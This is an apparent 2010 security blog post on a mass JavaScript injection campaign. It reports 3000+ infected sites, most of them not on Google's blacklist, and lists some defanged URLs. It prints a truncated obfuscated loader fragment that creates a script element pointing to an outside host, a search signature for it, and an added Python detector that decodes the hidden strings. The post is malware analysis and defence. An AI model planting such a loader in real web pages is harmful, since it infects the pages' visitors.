• Zero to 3000+ Infected Sites in Less Than 30 Minutes

    Code injection attacks show no signs of abating. Every day, more than 6000 new websites are added to Google’s Safe Browsing List (blacklist). Hackers compromise websites without the knowledge of the website owners in order to infect the websites’ visitors.

    Malicious hackers don’t care whether the website they infect is a small mom-and-pop operation or a large e-business. In most cases they use automated “bots”, which attack any and every website they can exploit. No website is off limits.

    As an example of the rampant nature of this problem, we will show how we found over 3000 infected websites, of which only a small percentage appears to be blacklisted by current website reputation services. One of the most reliable reputation services, offered by Google, identified only a small portion of the infected websites we mined from Google’s own search results. Identifying infected websites is not trivial.

    We recently saw a strong rise in the appearance of the malicious code below:

    this.v="";:LineMixer [var i=15492;var y=window;var  o='';var op='';
    var a='s*c*r:iVpTt:'.replace(/[\:
    
    TVJ\*]/g, '');var  yx=new Array();
    var u='c*r*eja_tjeYE_lYe*mYebn*t_'.replace(/[_\*bjY]/g,  '');
    var _=new Array();this.nt="";]var k;if(k!='dh' && k !=  '')
    {k=null};y.onload=function(){var w;if(w!='' &&  w!='ns'){w=null};
    try {this.n_=false;uh=document[u](a);var ow="";var  f="";
    var xl=new String();var xf="xf";:LineMixer  [uh['s;rpcp'.replace(/[p;t6O]/g, '')]
    ='hHt4tVp4:5/V/4e4x4aHmViVnVe4
    

    By searching Google for a small fragment of this code (shown below), we found a list of websites that harbor it. The mere appearance of this code on the pages of a website does not necessarily imply that the website is bad: a website administrator may simply have been asking for clarification on a help forum. Our systems therefore perform a detailed (automated) examination to remove any doubt.

    this.v="";:LineMixer [var i=
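
    The distinction drawn above, between a page that merely quotes the code and one that runs it, can be checked mechanically. The following is an added example, not code from the original post or from the authors' scanning system: it reports whether the search fragment sits inside a `<script>` element or only in displayed text, and statically decodes the sample's junk-character strings without executing any JavaScript. The names `triage` and `decode_junk_strings`, the verdict labels and the HTML wrapped around the fragments are assumptions made for illustration.

```python
import re
from html.parser import HTMLParser

SIGNATURE = 'this.v="";:LineMixer [var i='  # search fragment quoted in the article
# The sample's string-hiding idiom: 'junk-laced text'.replace(/[junk]/g, '')
JUNK_IDIOM = re.compile(
    r"'([^'\n]*)'\s*\.replace\(\s*/\[((?:\\.|[^\]\\])+)\]/g\s*,\s*''\s*\)")

def decode_junk_strings(js):
    """Evaluate each junk-stripping replace() statically; the JS is never run."""
    out = []
    for text, char_class in JUNK_IDIOM.findall(js):
        try:
            out.append(re.sub("[" + char_class + "]", "", text))
        except re.error:  # class uses syntax Python's re rejects: leave undecoded
            out.append(None)
    return out

class _Splitter(HTMLParser):  # <script> bodies (executed) vs page text (displayed)
    def __init__(self):
        super().__init__(convert_charrefs=True)
        self.in_script, self.script, self.text = False, [], []
    def handle_starttag(self, tag, attrs):
        if tag == "script":
            self.in_script = True
    def handle_endtag(self, tag):
        if tag == "script":
            self.in_script = False
    def handle_data(self, data):
        (self.script if self.in_script else self.text).append(data)

def triage(html):
    """Return (verdict, decoded strings): 'injected', 'mention' or 'clean'."""
    parser = _Splitter()
    parser.feed(html)
    parser.close()
    script = "".join(parser.script)
    if SIGNATURE in script:
        return "injected", decode_junk_strings(script)
    if SIGNATURE in "".join(parser.text):
        return "mention", []
    return "clean", []

# Constructed samples: fragments copied from the article, wrapped in made-up HTML.
INFECTED = r"""<script>this.v="";:LineMixer [var i=15492;
var u='c*r*eja_tjeYE_lYe*mYebn*t_'.replace(/[_\*bjY]/g, '');
uh['s;rpcp'.replace(/[p;t6O]/g, '')]</script>"""
MENTION = """<pre>What is this on my site? this.v=&quot;&quot;;:LineMixer [var i=</pre>"""
print(triage(INFECTED), triage(MENTION))
```

    The decoded strings show what the junk characters hide: the sample builds a DOM element and sets its `src`, the usual way an injected script pulls in content from another host.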
    

    Interestingly, only 5.7% of the 3000+ sites we found infected with this code were blacklisted by Google. This highlights the fact that even reliable blacklists, like Google’s Safe Browsing List, are not complete.

    Till next time.

    We show a small sample of the 3000+ infected websites below:

    hxxp://saipanlawyer.com/          (Not blacklisted, Mon Mar 1 10:19:34 PST 2010)
    hxxp://www.citydusk.com/          (Not blacklisted, Mon Mar 1 10:19:34 PST 2010)
    hxxp://de.pastebin.ca/1798028/    (Not blacklisted, Mon Mar 1 10:19:34 PST 2010)
    hxxp://www.hotel-ederhof.com/     (Not blacklisted, Mon Mar 1 10:19:34 PST 2010)
    hxxp://fast-weight-loss-plan.org/ (Not blacklisted, Mon Mar 1 10:19:34 PST 2010)
    
    • Some of these sites have bad code in addition to what you point out

      Posted by anon on March 1st

    • You are right; however, for the purpose of this post we are concentrating on one strain only.

      Posted by anirban on March 1st